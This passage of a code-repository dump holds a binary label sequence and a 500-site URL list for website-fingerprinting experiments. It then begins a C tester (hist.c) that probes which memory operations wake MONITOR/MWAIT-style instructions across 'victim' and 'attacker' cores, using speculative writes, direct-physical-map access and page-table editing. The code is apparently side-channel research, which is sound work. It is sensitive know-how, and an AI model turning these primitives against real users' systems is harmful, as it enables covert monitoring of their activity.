 893 | 1
 894 | 1
 895 | 1
 896 | 1
 897 | 0
 898 | 0
 899 | 0
 900 | 0
 901 | 0
 902 | 0
 903 | 1
 904 | 1
 905 | 1
 906 | 1
 907 | 1
 908 | 1
 909 | 1
 910 | 1
 911 | 1
 912 | 1
 913 | 1
 914 | 1
 915 | 1
 916 | 1
 917 | 1
 918 | 1
 919 | 0
 920 | 0
 921 | 0
 922 | 0
 923 | 0
 924 | 0
 925 | 0
 926 | 1
 927 | 1
 928 | 1
 929 | 1
 930 | 1
 931 | 1
 932 | 1
 933 | 0
 934 | 0
 935 | 0
 936 | 1
 937 | 1
 938 | 1
 939 | 1
 940 | 1
 941 | 1
 942 | 1
 943 | 1
 944 | 1
 945 | 1
 946 | 1
 947 | 1
 948 | 1
 949 | 1
 950 | 1
 951 | 1
 952 | 0
 953 | 0
 954 | 0
 955 | 0
 956 | 1
 957 | 1
 958 | 1
 959 | 1
 960 | 1
 961 | 1
 962 | 1
 963 | 0
 964 | 0
 965 | 0
 966 | 0
 967 | 0
 968 | 0
 969 | 0
 970 | 1
 971 | 1
 972 | 1
 973 | 1
 974 | 1
 975 | 1
 976 | 1
 977 | 1
 978 | 1
 979 | 1
 980 | 1
 981 | 1
 982 | 1
 983 | 1
 984 | 1
 985 | 1
 986 | 0
 987 | 0
 988 | 0
 989 | 0
 990 | 0
 991 | 0
 992 | 1
 993 | 1
 994 | 1
 995 | 1
 996 | 1
 997 | 1
 998 | 1
 999 | 1
1000 | 1
1001 | 1
1002 | 1
1003 | 1
1004 | 1
1005 | 1
1006 | 1
1007 | 1
1008 | 0
1009 | 0
1010 | 0
1011 | 0
1012 | 0
1013 | 0
1014 | 0
1015 | 1
1016 | 1
1017 | 1
1018 | 1
1019 | 1
1020 | 1
1021 | 1
1022 | 1
1023 | 0
1024 | 0
1025 | 0
1026 | 1
1027 | 1
1028 | 1
1029 | 1
1030 | 1
1031 | 1
1032 | 1
1033 | 1
1034 | 1
1035 | 1
1036 | 1
1037 | 1
1038 | 1
1039 | 1
1040 | 1
1041 | 1
1042 | 0
1043 | 0
1044 | 0
1045 | 1
1046 | 1
1047 | 1
1048 | 1
1049 | 1
1050 | 1
1051 | 1
1052 | 1
1053 | 0
1054 | 0
1055 | 0
1056 | 0
1057 | 0
1058 | 0
1059 | 0
1060 | 1
1061 | 1
1062 | 1
1063 | 1
1064 | 1
1065 | 1
1066 | 1
1067 | 1
1068 | 1
1069 | 1
1070 | 1
1071 | 1
1072 | 1
1073 | 1
1074 | 1
1075 | 0
1076 | 0
1077 | 0
1078 | 0
1079 | 0
1080 | 0
1081 | 0
1082 | 1
1083 | 1
1084 | 1
1085 | 1
1086 | 1
1087 | 1
1088 | 1
1089 | 1
1090 | 1
1091 | 1
1092 | 1
1093 | 1
1094 | 1
1095 | 1
1096 | 1
1097 | 0
1098 | 0
1099 | 0
1100 | 0
1101 | 0
1102 | 0
1103 | 0
1104 | 1
1105 | 1
1106 | 1
1107 | 1
1108 | 1
1109 | 1
1110 | 1
1111 | 1
1112 | 0
1113 | 0
1114 | 0
1115 | 1
1116 | 1
1117 | 1
1118 | 1
1119 | 1
1120 | 1
1121 | 1
1122 | 1
1123 | 1
1124 | 1
1125 | 1
1126 | 1
1127 | 1
1128 | 1
1129 | 1
1130 | 1
1131 | 0
1132 | 0
1133 | 0
1134 | 1
1135 | 1
1136 | 1
1137 | 1
1138 | 1
1139 | 1
1140 | 1
1141 | 1
1142 | 0
1143 | 0
1144 | 0
1145 | 0
1146 | 0
1147 | 0
1148 | 0
1149 | 1
1150 | 1
1151 | 1
1152 | 1
1153 | 1
1154 | 1
1155 | 1
1156 | 1
1157 | 1
1158 | 1
1159 | 1
1160 | 1
1161 | 1
1162 | 1
1163 | 1
1164 | 0
1165 | 0
1166 | 0
1167 | 0
1168 | 0
1169 | 0
1170 | 0
1171 | 1
1172 | 1
1173 | 1
1174 | 1
1175 | 1
1176 | 1
1177 | 1
1178 | 1
1179 | 1
1180 | 1
1181 | 1
1182 | 1
1183 | 1
1184 | 1
1185 | 1
1186 | 0
1187 | 0
1188 | 0
1189 | 0
1190 | 0
1191 | 0
1192 | 0
1193 | 1
1194 | 1
1195 | 1
1196 | 1
1197 | 1
1198 | 1
1199 | 1
1200 | 1
1201 | 0
1202 | 0
1203 | 0
1204 | 0
1205 | 0
1206 | 0
1207 | 0
1208 | 0
1209 | 0
1210 | 0
1211 | 0
1212 | 0
1213 | 0
1214 | 0
1215 | 0
1216 | 0
1217 | 0
1218 | 0
1219 | 0
1220 | 0
1221 | 0
1222 | 0
1223 | 0
1224 | 0
1225 | 0
1226 | 0
1227 | 0
1228 | 0
1229 | 0
1230 | 0
1231 | 0
1232 | 0
1233 | 0
1234 | 0
1235 | 0
1236 | 0
1237 | 0
1238 | 0
1239 | 0
1240 | 0
1241 | 0
1242 | 0
1243 | 0
1244 | 0
1245 | 0
1246 | 0
1247 | 0
1248 | 0
1249 | 0
1250 | 0
1251 | 0
1252 | 0
1253 | 0
1254 | 0
1255 | 0
1256 | 0
1257 | 0
1258 | 0
1259 | 0
1260 | 0
1261 | 0
1262 | 0
1263 | 0
1264 | 0
1265 | 0
1266 | 0
1267 | 0
1268 | 0
1269 | 0
1270 | 0
1271 | 0
1272 | 0
1273 | 0
1274 | 0
1275 | 0
1276 | 0
1277 | 0
1278 | 0
1279 | 0
1280 | 0
1281 | 0
1282 | 0
1283 | 0
1284 | 0
1285 | 0
1286 | 0
1287 | 0
1288 | 0
1289 | 0
1290 | 0
1291 | 0
1292 | 0
1293 | 0
1294 | 0
1295 | 0
1296 | 0
1297 | 0
1298 | 0
1299 | 0
1300 | 0
1301 | 0
1302 | 0
1303 | 0
1304 | 0
1305 | 0
1306 | 0
1307 | 0
1308 | 0
1309 | 0
1310 | 0
1311 | 0
1312 | 0
1313 | 0
1314 | 0
1315 | 0
1316 | 0
1317 | 0
1318 | 0
1319 | 0
1320 | 0
1321 | 0
1322 | 0
1323 | 0
1324 | 0
1325 | 0
1326 | 0
1327 | 0
1328 | 0
1329 | 0
1330 | 0
1331 | 0
1332 | 0
1333 | 0
1334 | 0
1335 | 0
1336 | 0
1337 | 0
1338 | 0
1339 | 0
1340 | 0
1341 | 0
1342 | 0
1343 | 0
1344 | 0
1345 | 0
1346 | 0
1347 | 0
1348 | 0
1349 | 0
1350 | 0
1351 | 0
1352 | 0
1353 | 0
1354 | 0
1355 | 0
1356 | 0
1357 | 0
1358 | 0
1359 | 0
1360 | 0
1361 | 0
1362 | 0
1363 | 0
1364 | 0
1365 | 0
1366 | 0
1367 | 0
1368 | 0
1369 | 0
1370 | 0
1371 | 0
1372 | 0
1373 | 0
1374 | 0
1375 | 0
1376 | 0
1377 | 0
1378 | 0
1379 | 0
1380 | 0
1381 | 0
1382 | 0
1383 | 0
1384 | 0
1385 | 0
1386 | 0
1387 | 0
1388 | 0
1389 | 0
1390 | 0
1391 | 0
1392 | 0
1393 | 0
1394 | 0
1395 | 0
1396 | 0
1397 | 0
1398 | 0
1399 | 0
1400 | 0
1401 | 


--------------------------------------------------------------------------------
/website_fingerprinting/list_500.txt:
--------------------------------------------------------------------------------
  1 | https://www.google.com
  2 | https://www.youtube.com
  3 | https://www.baidu.com
  4 | https://www.facebook.com
  5 | https://www.tmall.com
  6 | https://www.qq.com
  7 | https://www.taobao.com
  8 | https://www.sohu.com
  9 | https://www.yahoo.com
 10 | https://www.amazon.com
 11 | https://www.360.cn
 12 | https://www.jd.com
 13 | https://www.zhihu.com
 14 | https://www.wikipedia.org
 15 | https://www.sina.com.cn
 16 | https://www.weibo.com
 17 | https://www.netflix.com
 18 | https://www.163.com
 19 | https://www.instagram.com
 20 | https://www.bilibili.com
 21 | https://www.live.com
 22 | https://www.reddit.com
 23 | https://www.so.com
 24 | https://www.chaturbate.com
 25 | https://www.sogou.com
 26 | https://www.bing.com
 27 | https://www.zoom.us
 28 | https://www.google.com.hk
 29 | https://www.csdn.net
 30 | https://www.alipay.com
 31 | https://www.microsoft.com
 32 | https://www.soso.com
 33 | https://www.tianya.cn
 34 | https://www.vk.com
 35 | https://www.twitch.tv
 36 | https://www.myshopify.com
 37 | https://www.twitter.com
 38 | https://www.naver.com
 39 | https://www.yahoo.co.jp
 40 | https://www.office.com
 41 | https://www.zhanqi.tv
 42 | https://www.aliexpress.com
 43 | https://panda.tv
 44 | https://www.amazon.in
 45 | https://www.apple.com
 46 | https://www.bongacams.com
 47 | https://www.amazon.co.jp
 48 | https://www.ebay.com
 49 | https://www.whatsapp.com
 50 | https://www.okezone.com
 51 | https://www.yandex.ru
 52 | https://www.adobe.com
 53 | https://www.hao123.com
 54 | https://www.tiktok.com
 55 | https://www.microsoftonline.com
 56 | https://www.1688.com
 57 | https://www.binance.com
 58 | https://www.ok.ru
 59 | https://www.mail.ru
 60 | https://www.douban.com
 61 | https://www.linkedin.com
 62 | http://www.xinhuanet.com
 63 | https://www.blogger.com
 64 | https://www.etsy.com
 65 | https://www.msn.com
 66 | https://www.cnblogs.com
 67 | https://www.google.co.jp
 68 | https://www.google.co.in
 69 | https://www.pornhub.com
 70 | https://www.tradingview.com
 71 | https://www.google.com.br
 72 | https://www.huanqiu.com
 73 | https://www.aliyun.com
 74 | https://www.imdb.com
 75 | https://www.force.com
 76 | https://www.fandom.com
 77 | https://www.canva.com
 78 | https://www.medium.com
 79 | https://www.roblox.com
 80 | https://www.xvideos.com
 81 | https://www.pikiran-rakyat.com
 82 | https://www.yy.com
 83 | https://www.indeed.com
 84 | https://www.telegram.org
 85 | https://www.freepik.com
 86 | https://www.wordpress.com
 87 | https://www.google.de
 88 | https://www.chase.com
 89 | https://www.xhamster.com
 90 | https://www.flipkart.com
 91 | https://www.udemy.com
 92 | https://www.alibaba.com
 93 | https://www.spotify.com
 94 | https://www.w3schools.com
 95 | https://www.liputan6.com
 96 | https://www.dropbox.com
 97 | https://www.tribunnews.com
 98 | https://www.17ok.com
 99 | https://www.intuit.com
100 | https://www.primevideo.com
101 | https://www.amazonaws.com
102 | https://www.rakuten.co.jp
103 | https://www.trello.com
104 | https://www.paypal.com
105 | https://www.t.me
106 | https://www.google.es
107 | https://www.google.ru
108 | https://www.amazon.co.uk
109 | https://www.amazon.de
110 | https://www.zillow.com
111 | https://www.github.com
112 | https://www.google.fr
113 | https://www.cctv.com
114 | https://www.imgur.com
115 | https://www.instructure.com
116 | https://www.walmart.com
117 | https://www.booking.com
118 | https://www.yaolan.com
119 | https://www.cnn.com
120 | https://www.digikala.com
121 | https://www.grammarly.com
122 | https://www.espn.com
123 | https://www.stackoverflow.com
124 | https://www.youku.com
125 | https://www.salesforce.com
126 | https://www.disneyplus.com
127 | https://www.namecheap.com
128 | https://www.autohome.com.cn
129 | https://www.6.cn
130 | https://www.google.com.sg
131 | https://www.hbomax.com
132 | https://www.bitly.com
133 | https://www.nytimes.com
134 | https://www.jianshu.com
135 | https://www.youdao.com
136 | https://www.kompas.com
137 | https://www.envato.com
138 | https://www.notion.so
139 | https://www.ilovepdf.com
140 | https://www.shutterstock.com
141 | https://www.merdeka.com
142 | https://www.bbc.com
143 | https://www.google.it
144 | https://www.speedtest.net
145 | https://www.pinterest.com
146 | https://www.amazon.ca
147 | https://www.wix.com
148 | https://www.deepl.com
149 | https://www.tumblr.com
150 | https://www.tistory.com
151 | https://www.chess.com
152 | https://www.wellsfargo.com
153 | https://www.archive.org
154 | https://www.mama.cn
155 | https://www.ikea.com
156 | https://www.google.cn
157 | https://www.detik.com
158 | https://www.iqiyi.com
159 | https://www.pexels.com
160 | https://www.godaddy.com
161 | https://www.hulu.com
162 | https://www.americanexpress.com
163 | https://www.smallpdf.com
164 | https://www.toutiao.com
165 | https://www.namu.wiki
166 | https://www.indiatimes.com
167 | https://www.rednet.cn
168 | https://www.mediafire.com
169 | https://www.avito.ru
170 | https://www.xnxx.com
171 | https://www.tencent.com
172 | https://www.wetransfer.com
173 | https://www.zendesk.com
174 | https://www.pixnet.net
175 | https://www.unsplash.com
176 | https://www.bbc.co.uk
177 | https://www.varzesh3.com
178 | https://www.daum.net
179 | https://www.hotstar.com
180 | https://www.stackexchange.com
181 | https://www.line.me
182 | https://www.mozilla.org
183 | https://www.mihoyo.com
184 | https://www.linktr.ee
185 | https://www.craigslist.org
186 | https://www.trendyol.com
187 | https://www.spankbang.com
188 | https://www.ameblo.jp
189 | https://www.gome.com.cn
190 | https://www.homedepot.com
191 | https://www.soundcloud.com
192 | https://www.nih.gov
193 | https://www.hdfcbank.com
194 | https://www.ssyoutube.com
195 | https://www.redfin.com
196 | https://www.vimeo.com
197 | https://www.aliexpress.ru
198 | https://www.coinmarketcap.com
199 | https://www.mailchimp.com
200 | https://www.fiverr.com
201 | https://www.duckduckgo.com
202 | https://www.bet365.com
203 | https://www.op.gg
204 | https://www.istockphoto.com
205 | https://www.google.co.uk
206 | https://www.healthline.com
207 | https://www.weather.com
208 | https://www.capitalone.com
209 | https://www.yelp.com
210 | https://www.bet9ja.com
211 | https://www.worldfreshblog.com
212 | https://www.google.com.tr
213 | https://www.steamcommunity.com
214 | https://www.mercari.com
215 | https://www.geeksforgeeks.org
216 | https://www.gosuslugi.ru
217 | https://www.airbnb.com
218 | https://www.usps.com
219 | https://www.lazada.sg
220 | https://www.ci123.com
221 | https://www.ebay.de
222 | https://www.telewebion.com
223 | https://www.remove.bg
224 | https://www.etoro.com
225 | https://www.bankofamerica.com
226 | https://www.researchgate.net
227 | https://www.cloudfront.net
228 | https://www.grid.id
229 | https://www.xueqiu.com
230 | https://www.dribbble.com
231 | https://www.manage.wix.com
232 | https://www.wordpress.org
233 | https://www.icicibank.com
234 | https://www.amazon.fr
235 | https://www.themeforest.net
236 | https://www.google.com.mx
237 | https://www.in.gr
238 | https://www.heavy.com
239 | https://www.shaparak.ir
240 | https://www.investopedia.com
241 | https://www.wildberries.ru
242 | https://www.amazon.es
243 | https://www.rt.com
244 | https://www.ozon.ru
245 | https://www.metropoles.com
246 | https://www.suara.com
247 | https://www.google.ca
248 | https://www.globo.com
249 | https://www.y2mate.com
250 | https://www.onlinesbi.com
251 | https://www.youm7.com
252 | https://www.bestbuy.com
253 | https://www.mercadolivre.com.br
254 | https://www.bluehost.com
255 | https://www.irs.gov
256 | https://www.smzdm.com
257 | https://www.mercadolibre.com.ar
258 | https://www.nicovideo.jp
259 | https://www.forbes.com
260 | https://www.google.com.tw
261 | https://www.shimo.im
262 | https://www.ltn.com.tw
263 | https://www.redd.it
264 | https://www.discord.com
265 | https://www.secureserver.net
266 | https://www.fidelity.com
267 | https://www.iqbroker.com
268 | https://www.foxnews.com
269 | https://www.epicgames.com
270 | https://www.fedex.com
271 | https://www.patreon.com
272 | https://www.dailymail.co.uk
273 | https://www.shopee.tw
274 | https://www.orange.fr
275 | https://www.quizlet.com
276 | https://www.cnbeta.com
277 | https://www.scribd.com
278 | https://www.indiamart.com
279 | https://www.theguardian.com
280 | https://www.ups.com
281 | https://www.t.co
282 | https://www.tokopedia.com
283 | https://www.goodreads.com
284 | https://www.rokna.net
285 | https://www.3dmgame.com
286 | https://www.behance.net
287 | https://www.realtor.com
288 | https://www.yts.mx
289 | https://www.thepaper.cn
290 | https://www.quora.com
291 | https://www.delgarm.com
292 | https://www.samsung.com
293 | https://www.rutracker.org
294 | https://www.google.com.eg
295 | https://www.sahibinden.com
296 | https://www.runoob.com
297 | https://www.asos.com
298 | https://www.cnbc.com
299 | https://www.xervoo.net
300 | https://www.google.com.sa
301 | https://www.rakuten.com
302 | https://www.japanpost.jp
303 | https://www.skype.com
304 | https://www.google.pl
305 | https://www.shopee.co.id
306 | https://www.ifeng.com
307 | https://www.opensea.io
308 | https://www.ca.gov
309 | https://www.setn.com
310 | https://www.zol.com.cn
311 | https://www.ninisite.com
312 | https://www.namasha.com
313 | https://www.tripadvisor.com
314 | https://www.crowdworks.jp
315 | https://www.wikimedia.org
316 | https://www.ebay.co.uk
317 | https://www.51.la
318 | https://www.google.com.ar
319 | https://www.dailymotion.com
320 | https://www.aol.com
321 | https://www.target.com
322 | https://www.web.de
323 | https://www.zerodha.com
324 | https://www.taboola.com
325 | https://www.google.co.th
326 | https://www.chegg.com
327 | https://www.donya-e-eqtesad.com
328 | https://www.fc2.com
329 | https://www.infobae.com
330 | https://www.hupu.com
331 | https://www.dell.com
332 | https://www.bloomberg.com
333 | https://www.wayfair.com
334 | https://www.zippyshare.com
335 | https://www.evernote.com
336 | https://www.slideshare.net
337 | https://www.2mnd56.com
338 | https://www.sciencedirect.com
339 | https://www.hp.com
340 | https://www.shopee.com.my
341 | https://www.oschina.net
342 | https://www.ensonhaber.com
343 | https://www.people.com.cn
344 | https://www.albawabhnews.com
345 | https://www.yjc.news
346 | https://www.glassdoor.com
347 | https://www.calendly.com
348 | https://www.shein.com
349 | https://www.costco.com
350 | https://www.uol.com.br
351 | https://www.nike.com
352 | https://www.blackboard.com
353 | https://www.citi.com
354 | https://www.zhibo8.cc
355 | https://www.rambler.ru
356 | https://www.rezka.ag
357 | https://www.adp.com
358 | https://www.filimo.com
359 | https://www.businessinsider.com
360 | https://www.torob.com
361 | https://www.espncricinfo.com
362 | https://www.squarespace.com
363 | https://www.quillbot.com
364 | https://www.poocoin.app
365 | https://www.ebc.net.tw
366 | https://www.allegro.pl
367 | https://www.ibicn.com
368 | https://www.codegrepper.com
369 | https://www.onlyfans.com
370 | https://www.wikihow.com
371 | https://www.dytt8.net
372 | https://www.qoo10.sg
373 | https://www.wise.com
374 | https://www.dmm.co.jp
375 | https://www.olx.pl
376 | https://www.meesho.com
377 | https://www.nga.cn
378 | https://www.iloveimg.com
379 | https://www.jawapos.com
380 | https://www.yoox.com
381 | https://www.nordstrom.com
382 | https://www.ssense.com
383 | https://www.padlet.com
384 | https://www.google.co.id
385 | https://www.downloadoperagx.com
386 | https://www.wp.pl
387 | https://www.googlevideo.com
388 | https://www.weebly.com
389 | https://www.gismeteo.ru
390 | https://www.dbs.com.sg
391 | https://www.airtable.com
392 | https://www.proiezionidiborsa.it
393 | https://www.atlassian.com
394 | https://www.cnnic.cn
395 | https://www.ria.ru
396 | https://www.pinimg.com
397 | https://www.divar.ir
398 | https://www.washingtonpost.com
399 | https://www.szu.edu.cn
400 | https://www.namnak.com
401 | https://www.ndtv.com
402 | https://www.kooora.com
403 | https://www.softonic.com
404 | https://www.whois.com
405 | https://www.reverso.net
406 | https://www.lowes.com
407 | https://www.china.com
408 | https://www.cnet.com
409 | https://www.macys.com
410 | https://www.trustpilot.com
411 | https://www.expedia.com
412 | https://www.axieinfinity.com
413 | https://www.xxinn887.com
414 | https://www.kakao.com
415 | https://www.sindonews.com
416 | https://www.google.com.au
417 | https://www.dy2018.com
418 | https://www.amazon.it
419 | https://www.baiducontent.com
420 | https://www.accuweather.com
421 | https://www.360.com
422 | https://www.canada.ca
423 | https://www.cloudflare.com
424 | https://www.thesaurus.com
425 | https://www.wsj.com
426 | https://www.outbrain.com
427 | https://www.sonhoo.com
428 | https://www.taleo.net
429 | https://www.cuevana3.io
430 | https://www.pixiv.net
431 | https://www.pconline.com.cn
432 | https://www.deviantart.com
433 | https://www.marca.com
434 | https://www.crunchyroll.com
435 | https://www.kakaku.com
436 | https://www.td.com
437 | https://www.worldometers.info
438 | https://www.wartaekonomi.co.id
439 | https://www.r10.net
440 | https://www.trustedcpmrevenue.com
441 | https://www.1337x.to
442 | https://www.myworkdayjobs.com
443 | https://www.inquirer.net
444 | https://www.rottentomatoes.com
445 | https://www.rctiplus.com
446 | https://www.livejournal.com
447 | https://www.youporn.com
448 | https://www.as.com
449 | https://www.ebay-kleinanzeigen.de
450 | https://www.ubereats.com
451 | https://www.onet.pl
452 | https://www.cpmverdirect.com
453 | https://www.gmx.net
454 | https://www.hootsuite.com
455 | https://www.discordapp.com
456 | https://www.business.com.tm
457 | https://www.w3school.com.cn
458 | https://www.xmnn.cn
459 | https://www.uptodown.com
460 | https://www.hostgator.com
461 | https://www.cricbuzz.com
462 | https://www.ladbible.com
463 | https://www.clickbank.com
464 | https://www.huya.com
465 | https://www.epfindia.gov.in
466 | https://www.cjdropshipping.com
467 | https://www.powerlanguage.co.uk
468 | https://www.mytheresa.com
469 | https://www.gh0089.com
470 | https://www.coupang.com
471 | https://www.naukri.com
472 | https://www.flickr.com
473 | https://www.robinhood.com
474 | https://www.clickfunnels.com
475 | https://www.sonyliv.com
476 | https://www.zoho.com
477 | https://www.kapanlagi.com
478 | https://www.moneycontrol.com
479 | https://www.creditkarma.com
480 | https://www.11st.co.kr
481 | https://www.stripchat.com
482 | https://www.google.co.kr
483 | https://www.eatthis.com
484 | https://www.cnki.net
485 | https://www.rakuten-sec.co.jp
486 | https://www.att.com
487 | https://www.u.gg
488 | https://www.shopee.co.th
489 | https://www.xfinity.com
490 | https://www.ikco.ir
491 | https://www.reuters.com
492 | https://www.doordash.com
493 | https://www.pchome.com.tw
494 | https://www.poste.it
495 | https://www.zhiding.cn
496 | https://www.google.com.ua
497 | https://www.gsmarena.com
498 | https://www.n11.com
499 | https://www.myworkday.com
500 | https://www.akamaized.net 
501 | 


--------------------------------------------------------------------------------
/trigger-tester/hist.c:
--------------------------------------------------------------------------------
  1 | #define _GNU_SOURCE
  2 | #include <stdio.h>
  3 | #include <string.h>
  4 | 
  5 | #include <sys/types.h>
  6 | #include <sys/stat.h>
  7 | #include <sys/time.h>
  8 | #include <fcntl.h>
  9 | #include "cacheutils.h"
 10 | #include <pthread.h>
 11 | #include <sched.h>
 12 | #include <immintrin.h>
 13 | #include <signal.h>
 14 | #ifdef MONITOR_INTEL
 15 | #include "r0e.h"
 16 | #else
 17 | #include "ptedit_header.h"
 18 | #endif
 19 | 
 20 | // define cores for experiment
 21 | #define CORE_VICTIM 0
 22 | #define CORE_ATTACKER 1
 23 | 
 24 | // number of measurements
 25 | #define AVG_NO_TRIGGER 5
 26 | #define SKIP_TRIGGER 5
 27 | #define AVG_TRIGGER 5
 28 | 
 29 | // time interval for observing number of wakeups (in microseconds)
 30 | #define TIMER 10*1000
 31 | 
 32 | // direct physical map offset
 33 | #define DPM 0xffff888000000000ull
 34 | 
 35 | 
 36 | #define OFFSET (64 * 21)
 37 | 
 38 | #ifdef UMONITOR
 39 | #define INSTR_MONITOR asm volatile("umonitor %%rax" : : "a"(test + OFFSET), "c"(0), "d"(0));
 40 | #define INSTR_WAIT asm volatile("xor %%rbx, %%rbx; umwait %%rcx; jnc 1f; inc %%rbx; 1: nop" : "=b"(carry) : "a"(-1), "d"(-1), "c"(0));
 41 | #define INSTR_NAME "UMONITOR"
 42 | #endif
 43 | #ifdef MONITORX
 44 | #define INSTR_MONITOR asm volatile("monitorx" : : "a"(test + OFFSET), "c"(0), "d"(0));
 45 | #define INSTR_WAIT asm volatile("xor %%rbx, %%rbx; mwaitx; jnc 1f; inc %%rbx; 1: nop" : "=b"(carry) : "a"(-1), "d"(-1), "c"(0));
 46 | #define INSTR_NAME "MONITORX"
 47 | #endif
 48 | #ifdef MONITOR
 49 | #define INSTR_MONITOR asm volatile("monitor" : : "a"(test + OFFSET), "c"(0), "d"(0));
 50 | #define INSTR_WAIT asm volatile("mwait" : : "a"(0), "c"(0));
 51 | #define INSTR_NAME "MONITOR"
 52 | #endif
 53 | #ifdef MONITOR_INTEL
 54 | #define INSTR_MONITOR asm volatile("monitor" : : "a"(test + OFFSET), "c"(0), "d"(0));
 55 | #define INSTR_NAME "MONITOR_INTEL"
 56 | #endif
 57 | 
 58 | #ifndef INSTR_MONITOR
 59 | #error "No monitor/mwait instructions defined! Use -DUMONITOR, -DMONITORX, -DMONITOR, or -DMONITOR_INTEL to choose a monitoring instruction!"
 60 | #endif
 61 | 
 62 | 
 63 | #define TIMER_S  (TIMER / (1000000))
 64 | #define TIMER_US (TIMER % (1000000))
 65 | 
 66 | 
 67 | struct itimerval timer = {
 68 |     .it_interval = {.tv_sec = TIMER_S, .tv_usec = TIMER_US},
 69 |     .it_value = {.tv_sec = TIMER_S, .tv_usec = TIMER_US}
 70 | };
 71 | 
 72 | 
 73 | typedef void (*trigger_t)(char*, char*, char*);
 74 | typedef void (*setup_t)();
 75 | 
 76 | typedef struct {
 77 |     trigger_t trigger;
 78 |     const char* name;
 79 |     int success;
 80 |     setup_t setup;
 81 |     setup_t teardown;
 82 |     setup_t check;
 83 |     int execute;
 84 | } test_t;
 85 | 
 86 | 
 87 | void pin_to_core(int core) {
 88 |     cpu_set_t cpuset;
 89 |     pthread_t thread;
 90 | 
 91 |     thread = pthread_self();
 92 | 
 93 |     CPU_ZERO(&cpuset);
 94 |     CPU_SET(core, &cpuset);
 95 | 
 96 |     pthread_setaffinity_np(thread, sizeof(cpu_set_t), &cpuset);
 97 | }
 98 | 
 99 | 
100 | int can_execute(setup_t f) {
101 |     for(int i = 0; i < 32; i++) {
102 |         signal(i, trycatch_segfault_handler);
103 |     }
104 |     if(!setjmp(trycatch_buf)) {
105 |         f();
106 |         return 1;
107 |     }
108 |     return 0;
109 | }
110 | 
111 | 
112 | 
113 | void write_speculative2(void* ptr) {
114 |     speculation_start(s);
115 | //         maccess(0);
116 |         *(char*)ptr = 3;
117 |     speculation_end(s);
118 | }
119 | 
120 | void write_speculative_no_fault(void* ptr, int value) {
121 |     speculation_start(s);
122 |         *(char*)ptr = 3;
123 |     speculation_end(s);
124 | }
125 | 
126 | __attribute__((aligned(4096))) char test[4096 * 256];
127 | 
128 | // ---- test functions ----
129 | void flush_addr(char* addr, char* alias, char* dpm) {
130 |     flush(addr);
131 | }
132 | void flush_alias(char* addr, char* alias, char* dpm) {
133 |     flush(alias);
134 | }
135 | void flush_dpm(char* addr, char* alias, char* dpm) {
136 |     flush(dpm);
137 | }
138 | void flush_other_dpm(char* addr, char* alias, char* dpm) {
139 |     flush(dpm + 4096);
140 | }
141 | void write_addr(char* addr, char* alias, char* dpm) {
142 |     (*(volatile char*)addr) = 2;
143 | }
144 | void write_alias(char* addr, char* alias, char* dpm) {
145 |     (*(volatile char*)alias) = 2;
146 | }
147 | void write_dpm(char* addr, char* alias, char* dpm) {
148 |     (*(volatile char*)dpm) = 2;
149 | }
150 | void write_other_dpm(char* addr, char* alias, char* dpm) {
151 |     (*(volatile char*)(DPM)) = 2;
152 | }
153 | void write_spec_addr(char* addr, char* alias, char* dpm) {
154 |     write_speculative2(addr);
155 | }
156 | void write_spec_alias(char* addr, char* alias, char* dpm) {
157 |     write_speculative2(alias);
158 | }
159 | void write_spec_dpm(char* addr, char* alias, char* dpm) {
160 |     write_speculative2(dpm);
161 | }
162 | void write_spec_other_dpm(char* addr, char* alias, char* dpm) {
163 |     write_speculative2(dpm + 4096);
164 | }
165 | void access_addr(char* addr, char* alias, char* dpm) {
166 |     maccess(addr);
167 | }
168 | void write_fault_addr(char* addr, char* alias, char* dpm) {
169 |     maccess(dpm);
170 |     (*(volatile char*)addr) = 2;
171 | }
172 | void clwb_addr(char* addr, char* alias, char* dpm) {
173 |     asm volatile("clwb 0(%0)" : : "r"(addr));
174 | }
175 | void clwb_alias(char* addr, char* alias, char* dpm) {
176 |     asm volatile("clwb 0(%0)" : : "r"(alias));
177 | }
178 | void clwb_dpm(char* addr, char* alias, char* dpm) {
179 |     asm volatile("clwb 0(%0)" : : "r"(dpm));
180 | }
181 | void clzero_addr(char* addr, char* alias, char* dpm) {
182 |     asm volatile("clzero" : : "a"(addr));
183 | }
184 | void clzero_alias(char* addr, char* alias, char* dpm) {
185 |     asm volatile("clzero" : : "a"(alias));
186 | }
187 | void clzero_dpm(char* addr, char* alias, char* dpm) {
188 |     asm volatile("clzero" : : "a"(dpm));
189 | }
190 | void flushopt_dpm(char* addr, char* alias, char* dpm) {
191 |     asm volatile("clflushopt 0(%0)" : : "r"(dpm));
192 | }
193 | void prefetchw_addr(char* addr, char* alias, char* dpm) {
194 |     asm volatile("prefetchw 0(%0)" : : "r"(addr));
195 | }
196 | void prefetchw_alias(char* addr, char* alias, char* dpm) {
197 |     asm volatile("prefetchw 0(%0)" : : "r"(alias));
198 | }
199 | void prefetchw_dpm(char* addr, char* alias, char* dpm) {
200 |     asm volatile("prefetchw 0(%0)" : : "r"(dpm));
201 | }
202 | 
203 | // ---- setup / teardown functions ----
204 | void mark_uc() {
205 |     ptedit_entry_t entry = ptedit_resolve(test, 0);
206 |     int uc_mt = ptedit_find_first_mt(PTEDIT_MT_UC);
207 |     if (uc_mt == -1) {
208 |         printf("No UC MT available!\n");
209 |     }
210 |     entry.pte = ptedit_apply_mt(entry.pte, uc_mt);
211 |     entry.valid = PTEDIT_VALID_MASK_PTE;
212 |     ptedit_update(test, 0, &entry);
213 |     test[OFFSET] = 3;
214 | }
215 | 
216 | void mark_wb() {
217 |     ptedit_entry_t entry = ptedit_resolve(test, 0);
218 |     int uc_wb = ptedit_find_first_mt(PTEDIT_MT_WB);
219 |     if (uc_wb == -1) {
220 |         printf("No WB MT available!\n");
221 |     }
222 |     entry.pte = ptedit_apply_mt(entry.pte, uc_wb);
223 |     entry.valid = PTEDIT_VALID_MASK_PTE;
224 |     ptedit_update(test, 0, &entry);
225 | }
226 | 
227 | 
228 | void mark_ro() {
229 | 	mprotect(test, 4096, PROT_READ);
230 | }
231 | 
232 | void mark_rw() {
233 | 	mprotect(test, 4096, PROT_READ|PROT_WRITE);
234 | }
235 | 
236 | 
237 | // ---- check functions ----
238 | void clwb_check() {
239 |     clwb_addr(test, NULL, NULL);
240 | }
241 | void clzero_check() {
242 |     clzero_addr(test, NULL, NULL);
243 | }
244 | 
245 | test_t tests[] = {
246 |     {.trigger = access_addr, .name = "Access"},
247 |     {.trigger = write_addr, .name = "Write"},
248 |     {.trigger = write_addr, .name = "Write R/O", .setup = mark_ro, .teardown = mark_rw},
